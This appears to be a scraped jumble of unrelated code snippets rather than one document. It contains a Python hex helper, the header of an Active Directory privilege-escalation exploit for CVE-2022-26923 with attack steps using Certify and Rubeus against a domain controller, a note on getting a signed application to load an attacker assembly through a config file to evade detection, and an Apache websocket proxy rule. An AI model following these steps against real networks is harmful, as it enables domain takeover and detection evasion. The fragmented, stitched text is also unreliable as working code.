| import os | |
| import argparse | |
| import hashlib | |
| def file_to_hex(filename): | |
| """Convert file content to a hex string.""" | |
| with open(filename, 'rb') as file: | |
| content = file.read() | |
| return content.hex(), content |
| // Exploit for Active Directory Domain Privilege Escalation (CVE-2022–26923) | |
| // Author: @domchell - MDSec | |
| // This exploit can be used to update the relveant AD attributes required to enroll in a machine template as any machine in AD using an existing machine account | |
| // Adjusting MS-DS-Machine-Account-Quota is not sufficient to stop this attack :) | |
| // Steps: | |
| // 1. Escalate on any workstation (hint: krbrelayup ftw) | |
| // 2. Execute UpdateMachineAccount.exe as SYSTEM | |
| // 3. Enroll in machine template e.g. (Certify.exe request /ca:"ca.evil.corp\\CA" /template:Computer /machine /subject:CN=dc.evil.corp | |
| // 4. Request a TGT using the certificate e.g. (Rubeus.exe asktgt /user:dc$ /domain:evil.corp /dc:dc.evil.corp /certificate:<base64 cert> /enctype:AES256) |
| using System; | |
| using System.Collections.Generic; | |
| using System.Management; | |
| using System.DirectoryServices; | |
| using System.DirectoryServices.ActiveDirectory; | |
| using System.Text; | |
| using System.Runtime.Serialization.Formatters.Binary; | |
| using System.IO; | |
| using System.Collections; | |
| using System.Runtime.InteropServices; |
We can do this by experimenting with .config files.
Many defenders catch/detect files that are renamed, they do this by matching Original Filename to Process Name
In this example, we don't have to rename anything. We simple coerce a trusted signed app to load our Assembly.
We do this by directing the application to read a config file we provide.
| # a2enmod proxy_wstunnel | |
| RewriteEngine On | |
| RewriteCond %{HTTP:Upgrade} websocket [NC] | |
| RewriteCond %{QUERY_STRING} transport=websocket [NC] | |
| RewriteRule ^(.*) ws://localhost:10081/$1 [P] | |
| RewriteRule ^(.*) http://localhost:10081/$1 [P] |
